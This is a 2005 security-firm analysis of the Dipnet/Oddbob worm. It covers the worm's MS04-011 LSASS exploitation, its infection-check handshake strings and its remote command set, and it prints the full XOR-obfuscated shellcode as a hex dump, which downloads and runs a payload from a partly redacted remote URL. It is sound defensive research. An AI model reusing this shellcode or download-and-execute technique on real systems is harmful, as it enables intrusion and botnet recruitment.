Contact Us
Dipnet/Oddbob Worm Analysis
- URL: http://www.secureworks.com/research/threats/dipnet.html
- Date: January 13, 2005
- Author: Joe Stewart
Dipnet (or Oddbob) is a worm that spreads using the well-known MS04-011 vulnerability that Sasser was based on. Its purpose is to spread an IRC DDoS bot. Later variants of Dipnet are causing some interest due to unusual traffic patterns onTCP port 11768 (and later on TCP port 15118).
Analysis
Before Dipnet exploits a host, it first attempts to connect to that host on a chosen TCP port (11768 or 15118) and sends the string "__123_asdasdfdjhsdf_SAFasdfhjsdf_fsd123". If the host is already infected by Dipnet, it will respond with a specific response encoded in the body of the worm. The latest variant we've seen responds with "__1asdfasdFasdfhjsdf_fsd1092381-029348723-1AAA3", then closes the connection. This exchange allows the worm to avoid infecting hosts that are already running the latest version of the worm software.
If the worm ascertains that the host is not already infected, or is not running the latest version, it will then attempt to exploit the LSASS vulnerability on TCP port 445. The shellcode of the exploit is self-decrypting, with the bulk of the code XORed by 0xFF in order to obfuscate the payload strings and prevent null bytes from prematurely terminating the payload while being copied in memory by the affected host. When decrypted, the shellcode continues running and downloads the worm executable from a remote webserver and runs it.
The shellcode as received is as follows:
00000000 eb 00 06 00 eb 00 06 00 9b 00 2a 00 f9 00 77 00 |ë...ë.....*.ù.w.| 00000010 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 |................| 00000020 90 00 33 00 c0 00 f7 00 d0 00 8b 00 fb 00 f2 00 |..3.À.÷.Ð...û.ò.| 00000030 af 00 57 00 33 00 c9 00 b1 00 b2 00 90 00 90 00 |¯.W.3.É.±.².....| 00000040 90 00 90 00 80 00 37 00 ff 00 47 00 e2 00 fa 00 |......7.ÿ.G.â.ú.| 00000050 8b 00 ef 00 4d 00 5f 00 57 00 b8 00 30 00 fa 00 |..ï.M._.W.¸.0.ú.| 00000060 b0 00 83 00 f7 00 d0 00 ff 00 d0 00 8b 00 d8 00 |°...÷.Ð.ÿ.Ð...Ø.| 00000070 be 00 f8 00 ff 00 ff 00 ff 00 f7 00 d6 00 33 00 |¾.ø.ÿ.ÿ.ÿ.÷.Ö.3.| 00000080 c0 00 8b 00 c8 00 f7 00 d1 00 f2 00 ae 00 57 00 |À...È.÷.Ñ.ò.®.W.| 00000090 53 00 b8 00 56 00 19 00 b1 00 83 00 f7 00 d0 00 |S.¸.V...±...÷.Ð.| 000000a0 ff 00 d0 00 3e 00 89 00 44 00 b5 00 fd 00 4e 00 |ÿ.Ð.>...D.µ.ý.N.| 000000b0 0b 00 f6 00 75 00 e3 00 33 00 c0 00 8b 00 c8 00 |..ö.u.ã.3.À...È.| 000000c0 f7 00 d1 00 f2 00 ae 00 57 00 b8 00 30 00 fa 00 |÷.Ñ.ò.®.W.¸.0.ú.| 000000d0 b0 00 83 00 f7 00 d0 00 ff 00 d0 00 8b 00 d8 00 |°...÷.Ð.ÿ.Ð...Ø.| 000000e0 be 00 f5 00 ff 00 ff 00 ff 00 f7 00 d6 00 ba 00 |¾.õ.ÿ.ÿ.ÿ.÷.Ö.º.| 000000f0 f8 00 ff 00 ff 00 ff 00 f7 00 d2 00 52 00 33 00 |ø.ÿ.ÿ.ÿ.÷.Ò.R.3.| 00000100 c0 00 8b 00 c8 00 f7 00 d1 00 f2 00 ae 00 57 00 |À...È.÷.Ñ.ò.®.W.| 00000110 53 00 b8 00 56 00 19 00 b1 00 83 00 f7 00 d0 00 |S.¸.V...±...÷.Ð.| 00000120 ff 00 d0 00 3e 00 89 00 44 00 b5 00 fd 00 5a 00 |ÿ.Ð.>...D.µ.ý.Z.| 00000130 52 00 4e 00 3b 00 f2 00 75 00 e1 00 33 00 c0 00 |R.N.;.ò.u.á.3.À.| 00000140 8b 00 c8 00 f7 00 d1 00 f2 00 ae 00 90 00 90 00 |..È.÷.Ñ.ò.®.....| 00000150 33 00 c0 00 66 00 48 00 d1 00 e0 00 33 00 d2 00 |3.À.f.H.Ñ.à.3.Ò.| 00000160 50 00 52 00 ff 00 55 00 01 00 8b 00 f0 00 33 00 |P.R.ÿ.U.....ð.3.| 00000170 d2 00 52 00 52 00 52 00 52 00 57 00 ff 00 55 00 |Ò.R.R.R.R.W.ÿ.U.| 00000180 25 00 33 00 d2 00 52 00 52 00 52 00 52 00 8b 00 |%.3.Ò.R.R.R.R...| 00000190 d7 00 90 00 90 00 90 00 52 00 50 00 ff 00 55 00 |×.......R.P.ÿ.U.| 000001a0 21 00 57 00 33 00 d2 00 66 00 4a 00 d1 00 e2 00 |!.W.3.Ò.f.J.Ñ.â.| 000001b0 52 00 56 00 50 00 ff 00 55 00 1d 00 90 00 90 00 |R.V.P.ÿ.U.......| 000001c0 90 00 33 00 d2 00 52 00 b8 00 f4 00 ff 00 ff 00 |..3.Ò.R.¸.ô.ÿ.ÿ.| 000001d0 ff 00 f7 00 d0 00 8b 00 d5 00 2b 00 d0 00 42 00 |ÿ.÷.Ð...Õ.+.Ð.B.| 000001e0 90 00 90 00 52 00 ff 00 55 00 19 00 ff 00 37 00 |....R.ÿ.U...ÿ.7.| 000001f0 56 00 50 00 8b 00 d8 00 ff 00 55 00 15 00 53 00 |V.P...Ø.ÿ.U...S.| 00000200 ff 00 55 00 11 00 90 00 90 00 90 00 90 00 90 00 |ÿ.U.............| 00000210 33 00 d2 00 42 00 52 00 b8 00 f4 00 ff 00 ff 00 |3.Ò.B.R.¸.ô.ÿ.ÿ.| 00000220 ff 00 f7 00 d0 00 8b 00 d5 00 2b 00 d0 00 42 00 |ÿ.÷.Ð...Õ.+.Ð.B.| 00000230 90 00 90 00 90 00 52 00 ff 00 55 00 09 00 90 00 |......R.ÿ.U.....| 00000240 33 00 d2 00 f7 00 d2 00 c1 00 e2 00 04 00 52 00 |3.Ò.÷.Ò.Á.â...R.| 00000250 ff 00 55 00 05 00 eb 00 f3 00 90 00 87 00 db 00 |ÿ.U...ë.ó.....Û.| 00000260 ff 00 ff 00 ff 00 ff 00 b4 00 ba 00 ad 00 b1 00 |ÿ.ÿ.ÿ.ÿ.´.º..±.| 00000270 ba 00 b3 00 cc 00 cd 00 d1 00 bb 00 b3 00 b3 00 |º.³.Ì.Í.Ñ.».³.³.| 00000280 ff 00 a0 00 93 00 9c 00 8d 00 9a 00 9e 00 8b 00 |ÿ. .............| 00000290 ff 00 a0 00 93 00 88 00 8d 00 96 00 8b 00 9a 00 |ÿ. .............| 000002a0 ff 00 a0 00 93 00 9c 00 93 00 90 00 8c 00 9a 00 |ÿ. .............| 000002b0 ff 00 a0 00 93 00 9c 00 93 00 90 00 8c 00 9a 00 |ÿ. .............| 000002c0 ff 00 a8 00 96 00 91 00 ba 00 87 00 9a 00 9c 00 |ÿ.¨.....º.......| 000002d0 ff 00 ac 00 93 00 9a 00 9a 00 8f 00 ff 00 b8 00 |ÿ.¬.........ÿ.¸.| 000002e0 93 00 90 00 9d 00 9e 00 93 00 be 00 93 00 93 00 |..........¾.....| 000002f0 90 00 9c 00 ff 00 a8 00 b6 00 b1 00 b6 00 b1 00 |....ÿ.¨.¶.±.¶.±.| 00000300 ba 00 ab 00 d1 00 bb 00 b3 00 b3 00 ff 00 b6 00 |º.«.Ñ.».³.³.ÿ.¶.| 00000310 91 00 8b 00 9a 00 8d 00 91 00 9a 00 8b 00 b0 00 |..............°.| 00000320 8f 00 9a 00 91 00 be 00 ff 00 b6 00 91 00 8b 00 |......¾.ÿ.¶.....| 00000330 9a 00 8d 00 91 00 9a 00 8b 00 b0 00 8f 00 9a 00 |..........°.....| 00000340 91 00 aa 00 8d 00 93 00 be 00 ff 00 b6 00 91 00 |..ª.....¾.ÿ.¶...| 00000350 8b 00 9a 00 8d 00 91 00 9a 00 8b 00 ad 00 9a 00 |...............| 00000360 9e 00 9b 00 b9 00 96 00 93 00 9a 00 ff 00 97 00 |....¹.......ÿ...| 00000370 8b 00 8b 00 8f 00 c5 00 d0 00 d0 00 9e 00 8b 00 |......Å.Ð.Ð.....| 00000380 93 00 9e 00 91 00 8b 00 9c 00 90 00 92 00 92 00 |................| 00000390 9a 00 8d 00 9c 00 9a 00 d1 00 9c 00 90 00 92 00 |........Ñ.......| 000003a0 d0 00 8c 00 8b 00 8a 00 99 00 99 00 d1 00 9a 00 |Ð...........Ñ...| 000003b0 87 00 9a 00 ff 00 88 00 96 00 91 00 9c 00 9a 00 |....ÿ...........| 000003c0 8d 00 d1 00 9a 00 87 00 9a 00 ff 00 88 00 88 00 |..Ñ.......ÿ.....| 000003d0 88 00 88 00 88 00 88 00 88 00 88 00 88 00 88 00 |................| 000003e0 88 00 88 00 88 00 88 00 88 00 88 00 88 00 88 00 |................| 000003f0 88 00 88 00 88 00 88 00 88 00 88 00 88 00 88 00 |................| 00000400 88 00 88 00 88 00 88 00 88 00 88 00 88 00 88 00 |................| 00000410 88 00 88 00 88 00 88 00 88 00 88 00 ff 00 |............ÿ.|
The shellcode uses InternetOpenA and WinExec Windows API calls to download and execute a file from a URL. This particular shellcode downloads the file from:
http://atl<blocked>rce.com/stuff.exe
The worm executable sets up its own listener on the specified port in order to communicate with future instances of the worm that may attempt to exploit the host. It also communicates with two different websites in order to receive additional commands. Commands can be one of the following:
DIE: delete worm registry keys and exit DOWNLOAD: download a file via HTTP EXEC: execute a file RESET: restart the scanner with a new batch of IP address masks APPEND: insert additional IP address masks to scan
The first website provides the worm with a list of IP address ranges to scan and exploit. The second website provides the worm with other malware to download and execute. Finally, the worm begins to scan and exploit additional hosts based on the IP address masks given.
At the time of this writing, two additional executables were being served up by the control websites. One is an IRC DDoS bot identified as Backdoor.Win32.IRCBot.k, the other is a backdoor with a kernel-level driver that hides the process, known as Backdoor.Win32.Masteseq.
The DDoS bot connects to a channel on a private IRC server in Russia. At the time of this writing the channel had accumulated between 2800 and 2900 infected hosts.
